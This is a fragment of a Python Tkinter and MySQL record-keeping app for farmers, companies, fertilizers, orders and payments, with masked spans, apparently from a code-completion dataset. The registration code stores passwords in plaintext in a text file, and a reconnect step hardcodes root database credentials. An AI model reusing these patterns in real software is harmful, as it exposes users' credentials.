table.heading('c_name', text='Company Name')\n table.heading('c_address', text='Company Address')\n table['show'] = 
'headings'\n table.column('c_id', width=100)\n table.pack()\n cur.execute('SELECT * FROM company;')\n data = cur.fetchall()\n db.commit()\n if len(data) != 0:\n for row in data:\n table.insert('', END, values=row)\n\n\ndef insert_company():\n global e1, e2, e3, e4, e5, e6\n label = Label(root, text=' ' * 800, font=('Times new roman', 500), bg=\n 'tomato')\n label.place(x=0, y=0)\n label = Label(root, text='Company_id', font=('Times new roman', 20), bg\n ='white')\n label.place(x=50, y=10)\n label = Label(root, text='Company_name', font=('Times new roman', 20),\n bg='white')\n label.place(x=50, y=110)\n label = Label(root, text='Company_address', font=('Times new roman', 20\n ), bg='white')\n label.place(x=50, y=210)\n e1 = Entry(root, width=50)\n e2 = Entry(root, width=50)\n e3 = Entry(root, width=50)\n e1.place(x=350, y=10)\n e2.place(x=350, y=110)\n e3.place(x=350, y=210)\n Button = tk.Button(root, text='Back', font=('Arial', 15), command=company)\n Button.place(x=200, y=400)\n Button = tk.Button(root, text='Commit', font=('Arial', 15), command=\n insert_company_command)\n Button.place(x=400, y=400)\n\n\ndef insert_company_command():\n try:\n if len(e1.get()) > 3:\n invalid('company')\n else:\n sql = 'INSERT INTO company values(%s,%s,%s);'\n vals = e1.get(), e2.get(), e3.get()\n cur.executemany(sql, [vals])\n db.commit()\n company()\n except:\n insert_company()\n\n\ndef delete_company():\n global e1\n label = Label(root, text=' ' * 800, font=('Times new roman', 500), bg=\n 'tomato')\n label.place(x=0, y=0)\n label = Label(root, text='Company Id:', font=('Times new roman', 20),\n bg='tomato')\n label.place(x=100, y=200)\n e1 = Entry(root, width=50)\n e1.place(x=300, y=200)\n Button = tk.Button(root, text='Back', font=('Arial', 15), command=company)\n Button.place(x=200, y=400)\n Button = tk.Button(root, text='Commit', font=('Arial', 15), command=\n delete_company_command)\n Button.place(x=400, y=400)\n\n\ndef delete_company_command():\n try:\n sql = 'DELETE FROM 
company WHERE c_id=%s;'\n cur.execute(sql, [int(e1.get())])\n db.commit()\n company()\n except:\n l = Label(root, text='Invalid Entry', font=('times new roman', 15))\n l.place(x=100, y=300)\n\n\n<mask token>\n\n\ndef update_c():\n try:\n global e1, e2, e3, e4, e5, e6\n label = Label(root, text=' ' * 800, font=('Times new roman', 500),\n bg='tomato')\n label.place(x=0, y=0)\n sql = 'SELECT * FROM company WHERE c_id=%s;'\n vals = [e1.get()]\n cur.execute(sql, vals)\n label = Label(root, text='Company_id', font=('Times new roman', 20),\n bg='white')\n label.place(x=50, y=10)\n label = Label(root, text='Company_name', font=('Times new roman', \n 20), bg='white')\n label.place(x=50, y=110)\n label = Label(root, text='Company_address', font=('Times new roman',\n 20), bg='white')\n label.place(x=50, y=210)\n e1 = Entry(root)\n e2 = Entry(root)\n e3 = Entry(root)\n data = cur.fetchall()\n arr = [e1, e2, e3]\n count = 0\n for val in data[0]:\n arr[count].insert(0, val)\n count += 1\n e1.place(x=350, y=10)\n e2.place(x=350, y=110)\n e3.place(x=350, y=210)\n label = Button(root, text='Modify', font=('Times new roman', 20),\n bg='blue', command=update_command_c)\n label.place(x=300, y=400)\n except:\n l = Label(root, text='Invalid Farmer_id', font=('times new roman', 15))\n l.place(x=100, y=300)\n update_company()\n\n\n<mask token>\n\n\ndef search_company():\n global e1\n label = Label(root, text=' ' * 800, font=('Times new roman', 500), bg=\n 'tomato')\n label.place(x=0, y=0)\n label = Label(root, text='Company Id:', font=('Times new roman', 20),\n bg='tomato')\n label.place(x=100, y=200)\n e1 = Entry(root, width=50)\n e1.place(x=300, y=200)\n Button = tk.Button(root, text='Back', font=('Arial', 15), command=company)\n Button.place(x=200, y=400)\n Button = tk.Button(root, text='Search', font=('Arial', 15), command=\n search_c)\n Button.place(x=400, y=400)\n\n\ndef search_c():\n label = Label(root, text=' ' * 800, font=('Times new roman', 500), bg=\n 'tomato')\n 
label.place(x=0, y=0)\n try:\n sql = 'SELECT * FROM company WHERE c_id=%s;'\n val = [e1.get()]\n cur.execute(sql, val)\n Button = tk.Button(root, text='OK', font=('Arial', 15), command=company\n )\n Button.place(x=300, y=400)\n for val in cur:\n count = 0\n Y = 50\n names = ['company id: ', 'company name: ', 'company address: ']\n for i in val:\n label = Label(root, text=names[count] + str(i), font=(\n 'Times new roman', 20), bg='tomato')\n label.place(x=10, y=Y)\n Y += 50\n count += 1\n db.commit()\n except:\n l = Label(root, text='Invalid Company Id', font=('times new roman', 15)\n )\n l.place(x=100, y=300)\n search_company()\n\n\n<mask token>\n\n\ndef view_fer():\n frame = Frame(root, bd=5, relief=RIDGE, bg='tomato')\n frame.place(x=10, y=100, width=750, height=400)\n x_scroll = Scrollbar(frame, orient=HORIZONTAL)\n y_scroll = Scrollbar(frame, orient=VERTICAL)\n table = ttk.Treeview(frame, columns=('fe_formula', 'fe_name',\n 'fe_content', 'fe_price', 'company_id'), xscrollcommand=x_scroll.\n set, yscrollcommand=y_scroll.set)\n x_scroll.pack(side=BOTTOM, fill=X)\n y_scroll.pack(side=RIGHT, fill=Y)\n x_scroll.config(command=table.xview)\n y_scroll.config(command=table.yview)\n table.heading('fe_formula', text='Fertilizer Formula')\n table.heading('fe_name', text='Fertilizer name')\n table.heading('fe_content', text='Fertilizer content')\n table.heading('fe_price', text='Fertilizer price')\n table.heading('company_id', text='Company_id')\n table['show'] = 'headings'\n table.pack()\n cur.execute('SELECT * FROM fertilizer;')\n data = cur.fetchall()\n db.commit()\n if len(data) != 0:\n for row in data:\n table.insert('', END, values=row)\n\n\n<mask token>\n\n\ndef insert_fer_command():\n try:\n sql = 'INSERT INTO fertilizer values(%s,%s,%s,%s,%s);'\n vals = e1.get(), e2.get(), e3.get(), e4.get(), e5.get()\n cur.executemany(sql, [vals])\n db.commit()\n fertilizer()\n except:\n insert_fer()\n\n\ndef delete_fer():\n global e1\n label = Label(root, text=' ' * 800, 
font=('Times new roman', 500), bg=\n 'tomato')\n label.place(x=0, y=0)\n label = Label(root, text='Fertilizer formula:', font=('Times new roman',\n 20), bg='tomato')\n label.place(x=100, y=200)\n e1 = Entry(root, width=50)\n e1.place(x=300, y=200)\n Button = tk.Button(root, text='Back', font=('Arial', 15), command=\n fertilizer)\n Button.place(x=200, y=400)\n Button = tk.Button(root, text='Commit', font=('Arial', 15), command=\n delete_fer_command)\n Button.place(x=400, y=400)\n\n\ndef delete_fer_command():\n try:\n sql = 'DELETE FROM fertilizer WHERE fe_formula=%s;'\n cur.execute(sql, [e1.get()])\n db.commit()\n fertilizer()\n except:\n l = Label(root, text='Invalid Entry', font=('times new roman', 15))\n l.place(x=100, y=300)\n\n\ndef update_fer():\n global e1\n label = Label(root, text=' ' * 800, font=('Times new roman', 500), bg=\n 'tomato')\n label.place(x=0, y=0)\n label = Label(root, text='Fertlizer formula:', font=('Times new roman',\n 20), bg='tomato')\n label.place(x=100, y=200)\n e1 = Entry(root, width=50)\n e1.place(x=300, y=200)\n Button = tk.Button(root, text='OK', font=('Arial', 15), command=update_fe)\n Button.place(x=300, y=400)\n\n\ndef update_fe():\n try:\n global e1, e2, e3, e4, e5, e6\n label = Label(root, text=' ' * 800, font=('Times new roman', 500),\n bg='tomato')\n label.place(x=0, y=0)\n sql = 'SELECT * FROM fertilizer WHERE fe_formula=%s;'\n vals = [e1.get()]\n cur.execute(sql, vals)\n label = Label(root, text='Fertlizer formula', font=(\n 'Times new roman', 20), bg='white')\n label.place(x=50, y=10)\n label = Label(root, text='Fertlizer name', font=('Times new roman',\n 20), bg='white')\n label.place(x=50, y=60)\n label = Label(root, text='Fertlizer content', font=(\n 'Times new roman', 20), bg='white')\n label.place(x=50, y=110)\n label = Label(root, text='Fertlizer price', font=('Times new roman',\n 20), bg='white')\n label.place(x=50, y=160)\n label = Label(root, text='comapny_id', font=('Times new roman', 20),\n bg='white')\n 
label.place(x=50, y=210)\n e1 = Entry(root)\n e2 = Entry(root)\n e3 = Entry(root)\n e4 = Entry(root)\n e5 = Entry(root)\n data = cur.fetchall()\n arr = [e1, e2, e3, e4, e5, e6]\n count = 0\n for val in data[0]:\n arr[count].insert(0, val)\n count += 1\n e1.place(x=350, y=10)\n e2.place(x=350, y=60)\n e3.place(x=350, y=110)\n e4.place(x=350, y=160)\n e5.place(x=350, y=210)\n label = Button(root, text='Modify', font=('Times new roman', 20),\n bg='blue', command=update_command_fe)\n label.place(x=300, y=400)\n except:\n l = Label(root, text='Invalid Farmer_id', font=('times new roman', 15))\n l.place(x=100, y=300)\n update_fer()\n\n\n<mask token>\n\n\ndef search_fer():\n global e1\n label = Label(root, text=' ' * 800, font=('Times new roman', 500), bg=\n 'tomato')\n label.place(x=0, y=0)\n label = Label(root, text='Fertlizer formula:', font=('Times new roman',\n 20), bg='tomato')\n label.place(x=100, y=200)\n e1 = Entry(root, width=50)\n e1.place(x=300, y=200)\n Button = tk.Button(root, text='Back', font=('Arial', 15), command=\n fertilizer)\n Button.place(x=200, y=400)\n Button = tk.Button(root, text='Search', font=('Arial', 15), command=\n search_fe)\n Button.place(x=400, y=400)\n\n\ndef search_fe():\n label = Label(root, text=' ' * 800, font=('Times new roman', 500), bg=\n 'tomato')\n label.place(x=0, y=0)\n try:\n sql = 'SELECT * FROM fertilizer WHERE fe_formula=%s;'\n val = [e1.get()]\n cur.execute(sql, val)\n Button = tk.Button(root, text='OK', font=('Arial', 15), command=\n fertilizer)\n Button.place(x=300, y=400)\n for val in cur:\n count = 0\n Y = 50\n names = ['fertilizer formula: ', 'fertilizer name: ',\n 'fertilizer content: ', 'fertilizer price: ', 'company_id: ']\n for i in val:\n label = Label(root, text=names[count] + str(i), font=(\n 'Times new roman', 20), bg='tomato')\n label.place(x=10, y=Y)\n Y += 50\n count += 1\n db.commit()\n except:\n l = Label(root, text='Invalid Fertilizer formula', font=(\n 'times new roman', 15))\n l.place(x=100, y=300)\n 
search_fer()\n\n\ndef orders():\n global root\n label = Label(root, text=' ' * 800, font=('Times new roman', 500), bg=\n 'tomato')\n label.place(x=0, y=0)\n label = Label(root, text='Orders Table', font=('Times new roman', 15),\n bg='white')\n label.place(x=350, y=10)\n Button = tk.Button(root, text='Back', font=('Arial', 15), command=\n entity_page)\n Button.place(x=10, y=50)\n Button = tk.Button(root, text='Insert', font=('Arial', 15), command=\n insert_ord)\n Button.place(x=110, y=50)\n Button = tk.Button(root, text='Delete', font=('Arial', 15), command=\n delete_ord)\n Button.place(x=210, y=50)\n Button = tk.Button(root, text='Update', font=('Arial', 15), command=\n update_ord)\n Button.place(x=310, y=50)\n Button = tk.Button(root, text='Search', font=('Arial', 15), command=\n search_ord)\n Button.place(x=410, y=50)\n view_ord()\n\n\ndef view_ord():\n frame = Frame(root, bd=5, relief=RIDGE, bg='tomato')\n frame.place(x=10, y=100, width=750, height=400)\n x_scroll = Scrollbar(frame, orient=HORIZONTAL)\n y_scroll = Scrollbar(frame, orient=VERTICAL)\n table = ttk.Treeview(frame, columns=('or_id', 'or_date', 'or_fid',\n 'or_formula', 'or_to'), xscrollcommand=x_scroll.set, yscrollcommand\n =y_scroll.set)\n x_scroll.pack(side=BOTTOM, fill=X)\n y_scroll.pack(side=RIGHT, fill=Y)\n x_scroll.config(command=table.xview)\n y_scroll.config(command=table.yview)\n table.heading('or_id', text='Order Id')\n table.heading('or_date', text='Order Date')\n table.heading('or_fid', text='Ordered Farmer Id')\n table.heading('or_formula', text='Order (item)formula')\n table.heading('or_to', text='Order to')\n table['show'] = 'headings'\n table.pack()\n cur.execute('SELECT * FROM orders;')\n data = cur.fetchall()\n db.commit()\n if len(data) != 0:\n for row in data:\n table.insert('', END, values=row)\n\n\n<mask token>\n\n\ndef insert_ord():\n global e1, e2, e3, e4, e5, e6\n label = Label(root, text=' ' * 800, font=('Times new roman', 500), bg=\n 'tomato')\n label.place(x=0, y=0)\n 
label = Label(root, text='Order Id', font=('Times new roman', 20), bg=\n 'white')\n label.place(x=50, y=10)\n label = Label(root, text='Order date', font=('Times new roman', 20), bg\n ='white')\n label.place(x=50, y=60)\n label = Label(root, text='Order FID', font=('Times new roman', 20), bg=\n 'white')\n label.place(x=50, y=110)\n label = Label(root, text='Order formula', font=('Times new roman', 20),\n bg='white')\n label.place(x=50, y=160)\n label = Label(root, text='Order to', font=('Times new roman', 20), bg=\n 'white')\n label.place(x=50, y=210)\n e1 = Entry(root, width=50)\n e2 = Entry(root, width=50)\n e3 = Entry(root, width=50)\n e4 = Entry(root, width=50)\n e5 = Entry(root, width=50)\n e1.place(x=350, y=10)\n e2.place(x=350, y=60)\n e2.insert(0, datetime.now())\n e3.place(x=350, y=110)\n e4.place(x=350, y=160)\n e5.place(x=350, y=210)\n Button = tk.Button(root, text='Back', font=('Arial', 15), command=orders)\n Button.place(x=200, y=400)\n Button = tk.Button(root, text='Commit', font=('Arial', 15), command=\n insert_ord_command)\n Button.place(x=400, y=400)\n\n\ndef insert_ord_command():\n try:\n sql = 'INSERT INTO orders values(%s,%s,%s,%s,%s);'\n vals = e1.get(), e2.get(), e3.get(), e4.get(), e5.get()\n cur.executemany(sql, [vals])\n db.commit()\n orders()\n except:\n insert_ord()\n\n\ndef delete_ord():\n global e1\n label = Label(root, text=' ' * 800, font=('Times new roman', 500), bg=\n 'tomato')\n label.place(x=0, y=0)\n label = Label(root, text='Order Id:', font=('Times new roman', 20), bg=\n 'tomato')\n label.place(x=100, y=200)\n e1 = Entry(root, width=50)\n e1.place(x=300, y=200)\n Button = tk.Button(root, text='Back', font=('Arial', 15), command=orders)\n Button.place(x=200, y=400)\n Button = tk.Button(root, text='Commit', font=('Arial', 15), command=\n delete_ord_command)\n Button.place(x=400, y=400)\n\n\ndef delete_ord_command():\n try:\n sql = 'DELETE FROM orders WHERE or_id=%s;'\n cur.execute(sql, [e1.get()])\n db.commit()\n orders()\n 
except:\n l = Label(root, text='Invalid Entry', font=('times new roman', 15))\n l.place(x=100, y=300)\n\n\n<mask token>\n\n\ndef update_or():\n try:\n global e1, e2, e3, e4, e5, e6\n label = Label(root, text=' ' * 800, font=('Times new roman', 500),\n bg='tomato')\n label.place(x=0, y=0)\n sql = 'SELECT * FROM orders WHERE or_id=%s;'\n vals = [e1.get()]\n cur.execute(sql, vals)\n label = Label(root, text='Order Id', font=('Times new roman', 20),\n bg='white')\n label.place(x=50, y=10)\n label = Label(root, text='Order Date', font=('Times new roman', 20),\n bg='white')\n label.place(x=50, y=60)\n label = Label(root, text='Order f_id', font=('Times new roman', 20),\n bg='white')\n label.place(x=50, y=110)\n label = Label(root, text='Order formula', font=('Times new roman', \n 20), bg='white')\n label.place(x=50, y=160)\n label = Label(root, text='Order to', font=('Times new roman', 20),\n bg='white')\n label.place(x=50, y=210)\n e1 = Entry(root)\n e2 = Entry(root)\n e3 = Entry(root)\n e4 = Entry(root)\n e5 = Entry(root)\n data = cur.fetchall()\n arr = [e1, e2, e3, e4, e5, e6]\n count = 0\n for val in data[0]:\n arr[count].insert(0, val)\n count += 1\n e1.place(x=350, y=10)\n e2.place(x=350, y=60)\n e3.place(x=350, y=110)\n e4.place(x=350, y=160)\n e5.place(x=350, y=210)\n label = Button(root, text='Modify', font=('Times new roman', 20),\n bg='blue', command=update_command_ord)\n label.place(x=300, y=400)\n except:\n l = Label(root, text='Invalid Order_id', font=('times new roman', 15))\n l.place(x=100, y=300)\n update_ord()\n\n\ndef update_command_ord():\n sql = (\n 'UPDATE orders SET or_date=%s,or_fid=%s,or_formula=%s,or_to=%s WHERE or_id=%s;'\n )\n vals = e2.get(), e3.get(), e4.get(), e5.get(), e1.get()\n cur.executemany(sql, [vals])\n db.commit()\n orders()\n\n\ndef search_ord():\n global e1\n label = Label(root, text=' ' * 800, font=('Times new roman', 500), bg=\n 'tomato')\n label.place(x=0, y=0)\n label = Label(root, text='Order Id:', font=('Times new roman', 
20), bg=\n 'tomato')\n label.place(x=100, y=200)\n e1 = Entry(root, width=50)\n e1.place(x=300, y=200)\n Button = tk.Button(root, text='Back', font=('Arial', 15), command=orders)\n Button.place(x=200, y=400)\n Button = tk.Button(root, text='Search', font=('Arial', 15), command=\n search_or)\n Button.place(x=400, y=400)\n\n\ndef search_or():\n label = Label(root, text=' ' * 800, font=('Times new roman', 500), bg=\n 'tomato')\n label.place(x=0, y=0)\n try:\n sql = 'SELECT * FROM orders WHERE or_id=%s;'\n val = [e1.get()]\n cur.execute(sql, val)\n Button = tk.Button(root, text='OK', font=('Arial', 15), command=orders)\n Button.place(x=300, y=400)\n for val in cur:\n count = 0\n Y = 50\n names = ['order Id: ', 'Order date: ', 'Order fid: ',\n 'Order formula: ', 'order to: ']\n for i in val:\n label = Label(root, text=names[count] + str(i), font=(\n 'Times new roman', 20), bg='tomato')\n label.place(x=10, y=Y)\n Y += 50\n count += 1\n db.commit()\n except:\n l = Label(root, text='Invalid order id', font=('times new roman', 15))\n l.place(x=100, y=300)\n search_ord()\n\n\ndef payment():\n global root\n label = Label(root, text=' ' * 800, font=('Times new roman', 500), bg=\n 'tomato')\n label.place(x=0, y=0)\n label = Label(root, text='Payment Table', font=('Times new roman', 15),\n bg='white')\n label.place(x=350, y=10)\n Button = tk.Button(root, text='Back', font=('Arial', 15), command=\n entity_page)\n Button.place(x=10, y=50)\n Button = tk.Button(root, text='Insert', font=('Arial', 15), command=\n insert_pay)\n Button.place(x=110, y=50)\n Button = tk.Button(root, text='Delete', font=('Arial', 15), command=\n delete_pay)\n Button.place(x=210, y=50)\n Button = tk.Button(root, text='Update', font=('Arial', 15), command=\n update_pay)\n Button.place(x=310, y=50)\n Button = tk.Button(root, text='Search', font=('Arial', 15), command=\n search_pay)\n Button.place(x=410, y=50)\n view_pay()\n\n\ndef view_pay():\n frame = Frame(root, bd=5, relief=RIDGE, bg='tomato')\n 
frame.place(x=10, y=100, width=750, height=400)\n x_scroll = Scrollbar(frame, orient=HORIZONTAL)\n y_scroll = Scrollbar(frame, orient=VERTICAL)\n table = ttk.Treeview(frame, columns=('trans_id', 'p_f_id', 'p_date',\n 'p_amount', 'p_method'), xscrollcommand=x_scroll.set,\n yscrollcommand=y_scroll.set)\n x_scroll.pack(side=BOTTOM, fill=X)\n y_scroll.pack(side=RIGHT, fill=Y)\n x_scroll.config(command=table.xview)\n y_scroll.config(command=table.yview)\n table.heading('trans_id', text='Transaction Id')\n table.heading('p_f_id', text='Farmer Id')\n table.heading('p_date', text='Payment Date')\n table.heading('p_amount', text='Amount')\n table.heading('p_method', text='Payment Method')\n table['show'] = 'headings'\n table.pack()\n cur.execute('SELECT * FROM payment;')\n data = cur.fetchall()\n db.commit()\n if len(data) != 0:\n for row in data:\n table.insert('', END, values=row)\n\n\n<mask token>\n\n\ndef insert_pay():\n global e1, e2, e3, e4, e5, e6\n label = Label(root, text=' ' * 800, font=('Times new roman', 500), bg=\n 'tomato')\n label.place(x=0, y=0)\n label = Label(root, text='Transaction Id', font=('Times new roman', 20),\n bg='white')\n label.place(x=50, y=10)\n label = Label(root, text='Transaction farmer id', font=(\n 'Times new roman', 20), bg='white')\n label.place(x=50, y=60)\n label = Label(root, text='Transaction date', font=('Times new roman', \n 20), bg='white')\n label.place(x=50, y=110)\n label = Label(root, text='Transaction amount', font=('Times new roman',\n 20), bg='white')\n label.place(x=50, y=160)\n label = Label(root, text='Transaction method', font=('Times new roman',\n 20), bg='white')\n label.place(x=50, y=210)\n e1 = Entry(root, width=50)\n e2 = Entry(root, width=50)\n e3 = Entry(root, width=50)\n e4 = Entry(root, width=50)\n e5 = Entry(root, width=50)\n e1.place(x=350, y=10)\n e2.place(x=350, y=60)\n e3.place(x=350, y=110)\n e3.insert(0, datetime.now())\n e4.place(x=350, y=160)\n e5 = StringVar(root)\n e5.set('Debit card')\n w = 
OptionMenu(root, e5, 'Credit Card', 'UPI', 'Cheque', 'Cash')\n w.place(x=350, y=210)\n Button = tk.Button(root, text='Back', font=('Arial', 15), command=payment)\n Button.place(x=200, y=400)\n Button = tk.Button(root, text='Commit', font=('Arial', 15), command=\n insert_pay_command)\n Button.place(x=400, y=400)\n\n\ndef insert_pay_command():\n try:\n sql = 'INSERT INTO payment values(%s,%s,%s,%s,%s);'\n vals = e1.get(), e2.get(), e3.get(), e4.get(), e5.get()\n cur.executemany(sql, [vals])\n db.commit()\n payment()\n except:\n insert_pay()\n\n\ndef delete_pay():\n global e1\n label = Label(root, text=' ' * 800, font=('Times new roman', 500), bg=\n 'tomato')\n label.place(x=0, y=0)\n label = Label(root, text='Transaction Id:', font=('Times new roman', 20\n ), bg='tomato')\n label.place(x=100, y=200)\n e1 = Entry(root, width=50)\n e1.place(x=300, y=200)\n Button = tk.Button(root, text='Back', font=('Arial', 15), command=payment)\n Button.place(x=200, y=400)\n Button = tk.Button(root, text='Commit', font=('Arial', 15), command=\n delete_pay_command)\n Button.place(x=400, y=400)\n\n\n<mask token>\n\n\ndef search_pay():\n global e1\n label = Label(root, text=' ' * 800, font=('Times new roman', 500), bg=\n 'tomato')\n label.place(x=0, y=0)\n label = Label(root, text='Transaction Id:', font=('Times new roman', 20\n ), bg='tomato')\n label.place(x=100, y=200)\n e1 = Entry(root, width=50)\n e1.place(x=300, y=200)\n Button = tk.Button(root, text='Back', font=('Arial', 15), command=payment)\n Button.place(x=200, y=400)\n Button = tk.Button(root, text='Search', font=('Arial', 15), command=\n search_pa)\n Button.place(x=400, y=400)\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef First_page(root):\n global T1, T2, T3\n frame = Frame(root, height=500, width=800, bg='ivory')\n frame.pack()\n label = Label(root, text='WELCOME TO AGRI MARKET', font=(\n 'Times new roman', 25))\n label.place(x=200, y=50)\n button = Button(root, text='LogIn', font=('times new roman', 20),\n command=check_pass, bg='green')\n button.place(x=350, y=350)\n L1 = tk.Label(root, text='Username', font=('Arial Bold', 15), bg='ivory')\n L1.place(x=150, y=200)\n T1 = tk.Entry(root, width=30, bd=5)\n T1.place(x=280, y=200)\n L2 = tk.Label(root, text='Password', font=('Arial Bold', 15), bg='ivory')\n L2.place(x=150, y=250)\n T2 = tk.Entry(root, width=30, show='*', bd=5)\n T2.place(x=280, y=250)\n reg_button = Button(root, text='Register', font=('Arial Bold', 15), bg=\n 'blue', command=create_pass)\n reg_button.place(x=340, y=400)\n\n\n<mask token>\n\n\ndef create_pass():\n global root, T1, T2, T3\n label = Label(root, text=' ' * 800, font=('Times new roman', 500), bg=\n 'ivory')\n label.place(x=0, y=0)\n L1 = tk.Label(root, text='Username', font=('Arial Bold', 15), bg='ivory')\n L1.place(x=150, y=200)\n T1 = tk.Entry(root, width=30, bd=5)\n T1.place(x=380, y=200)\n L2 = tk.Label(root, text='Password', font=('Arial Bold', 15), bg='ivory')\n L2.place(x=150, y=250)\n T2 = tk.Entry(root, width=30, show='*', bd=5)\n T2.place(x=380, y=250)\n L2 = tk.Label(root, text='Confirm Password', font=('Arial Bold', 15),\n bg='ivory')\n L2.place(x=150, y=300)\n T3 = tk.Entry(root, width=30, show='*', bd=5)\n T3.place(x=380, y=300)\n reg_button = Button(root, text='Done', font=('Arial Bold', 15), bg=\n 'blue', command=add_pass)\n reg_button.place(x=440, y=400)\n\n\ndef add_pass():\n global root, T1, T2, T3\n if T2.get() != T3.get():\n label = Label(root, text='Incorrect Password. 
Enter again', font=(\n 'times new roman', 20))\n label.place(x=100, y=100)\n else:\n try:\n with open('password.txt', 'r') as f:\n data = f.read()\n with open('password.txt', 'w') as f:\n f.write(data + '\\n')\n f.write(T1.get() + '=' + T2.get())\n entity_page()\n except:\n with open('password.txt', 'w') as f:\n f.write(T1.get() + '=' + T2.get())\n entity_page()\n\n\ndef entity_page():\n global root\n label = Label(root, text=' ' * 800, font=('Times new roman', 500), bg=\n 'ivory')\n label.place(x=0, y=0)\n label = Label(root, text='WELCOME TO AGRI MARKET ', font=(\n 'Times new roman', 20), bg='blue')\n label.place(x=200, y=20)\n label = Label(root, text='Choose the Entity ', font=('Times new roman',\n 20), bg='white')\n label.place(x=250, y=100)\n Button = tk.Button(root, text='Farmers', font=('Arial', 15), command=farmer\n )\n Button.place(x=100, y=150 + 25)\n Button = tk.Button(root, text='Company', font=('Arial', 15), command=\n company)\n Button.place(x=300, y=150 + 25)\n Button = tk.Button(root, text='Fertilizer', font=('Arial', 15), command\n =fertilizer)\n Button.place(x=500, y=150 + 25)\n Button = tk.Button(root, text='Order', font=('Arial', 15), command=orders)\n Button.place(x=200, y=300 + 25)\n Button = tk.Button(root, text='Payment', font=('Arial', 15), command=\n payment)\n Button.place(x=400, y=300 + 25)\n Button = tk.Button(root, text='GET BOOKING HISTORY', font=('Arial', 15),\n command=history)\n Button.place(x=200, y=400 + 25)\n\n\ndef history():\n global root, cur, db\n label = Label(root, text=' ' * 800, font=('Times new roman', 500), bg=\n 'tomato')\n label.place(x=0, y=0)\n cur.execute('CALL getMonth(%s);', [datetime.today().strftime('%m')])\n data = cur.fetchall()\n label = Label(root, text='The Transaction History of this month', font=\n ('Arial', 15))\n label.place(x=200, y=20)\n button = Button(root, text='BACK', command=entity_page)\n button.place(x=20, y=20)\n frame = Frame(root, bd=5, relief=RIDGE, bg='tomato')\n frame.place(x=10, 
y=100, width=750, height=400)\n x_scroll = Scrollbar(frame, orient=HORIZONTAL)\n y_scroll = Scrollbar(frame, orient=VERTICAL)\n table = ttk.Treeview(frame, columns=('trans_id', 'p_f_id', 'p_date',\n 'p_amount', 'p_method'), xscrollcommand=x_scroll.set,\n yscrollcommand=y_scroll.set)\n x_scroll.pack(side=BOTTOM, fill=X)\n y_scroll.pack(side=RIGHT, fill=Y)\n x_scroll.config(command=table.xview)\n y_scroll.config(command=table.yview)\n table.heading('trans_id', text='Transaction Id')\n table.heading('p_f_id', text='Farmer Id')\n table.heading('p_date', text='Payment Date')\n table.heading('p_amount', text='Amount')\n table.heading('p_method', text='Payment Method')\n table['show'] = 'headings'\n table.pack()\n if len(data) != 0:\n for row in data:\n table.insert('', END, values=row)\n db.close()\n db = mysql.connector.connect(host='localhost', user='root', passwd=\n 'bhushi', database='farmer_app')\n cur = db.cursor()\n\n\n<mask token>\n\n\ndef view_farmer():\n frame = Frame(root, bd=5, relief=RIDGE, bg='tomato')\n frame.place(x=10, y=100, width=750, height=400)\n x_scroll = Scrollbar(frame, orient=HORIZONTAL)\n y_scroll = Scrollbar(frame, orient=VERTICAL)\n table = ttk.Treeview(frame, columns=('f_id', 'f_name', 'f_phone',\n 'f_mail', 'f_locality', 'f_address'), xscrollcommand=x_scroll.set,\n yscrollcommand=y_scroll.set)\n x_scroll.pack(side=BOTTOM, fill=X)\n y_scroll.pack(side=RIGHT, fill=Y)\n x_scroll.config(command=table.xview)\n y_scroll.config(command=table.yview)\n table.heading('f_id', text='Farmer Id')\n table.heading('f_name', text='Farmer Name')\n table.heading('f_phone', text='Farmer Phone')\n table.heading('f_mail', text='Farmer Mail')\n table.heading('f_locality', text='Farmer Locality')\n table.heading('f_address', text='Farmer Address')\n table['show'] = 'headings'\n table.column('f_id', width=100)\n table.pack()\n cur.execute('SELECT * FROM farmer;')\n data = cur.fetchall()\n db.commit()\n if len(data) != 0:\n for row in data:\n table.insert('', END, 
values=row)\n\n\n<mask token>\n\n\ndef insert_farmer():\n global e1, e2, e3, e4, e5, e6\n label = Label(root, text=' ' * 800, font=('Times new roman', 500), bg=\n 'tomato')\n label.place(x=0, y=0)\n label = Label(root, text='Farmer_id', font=('Times new roman', 20), bg=\n 'white')\n label.place(x=50, y=10)\n label = Label(root, text='Farmer_name', font=('Times new roman', 20),\n bg='white')\n label.place(x=50, y=60)\n label = Label(root, text='Farmer_phone', font=('Times new roman', 20),\n bg='white')\n label.place(x=50, y=110)\n label = Label(root, text='Farmer_mail', font=('Times new roman', 20),\n bg='white')\n label.place(x=50, y=160)\n label = Label(root, text='Farmer_locality', font=('Times new roman', 20\n ), bg='white')\n label.place(x=50, y=210)\n label = Label(root, text='Farmer_address', font=('Times new roman', 20),\n bg='white')\n label.place(x=50, y=270)\n e1 = Entry(root, width=50)\n e2 = Entry(root, width=50)\n e3 = Entry(root, width=50)\n e4 = Entry(root, width=50)\n e5 = Entry(root, width=50)\n e6 = Entry(root, width=50)\n e1.place(x=350, y=10)\n e2.place(x=350, y=60)\n e3.place(x=350, y=110)\n e4.place(x=350, y=160)\n e5.place(x=350, y=210)\n e6.place(x=350, y=270)\n Button = tk.Button(root, text='Back', font=('Arial', 15), command=farmer)\n Button.place(x=200, y=400)\n Button = tk.Button(root, text='Commit', font=('Arial', 15), command=\n insert_farmer_command)\n Button.place(x=400, y=400)\n\n\n<mask token>\n\n\ndef invalid(page):\n label = Label(root, text=' ' * 800, font=('Times new roman', 500), bg=\n 'tomato')\n label.place(x=0, y=0)\n if page == 'farmer':\n label = Label(root, text='Enter valid farmer_id', font=(\n 'Times new roman', 30), bg='white')\n label.place(x=170, y=200)\n button = Button(root, text='Re-enter', font=('Times new roman', 20),\n command=insert_farmer)\n button.place(x=300, y=400)\n elif page == 'company':\n label = Label(root, text='Enter valid company_id', font=(\n 'Times new roman', 30), bg='white')\n 
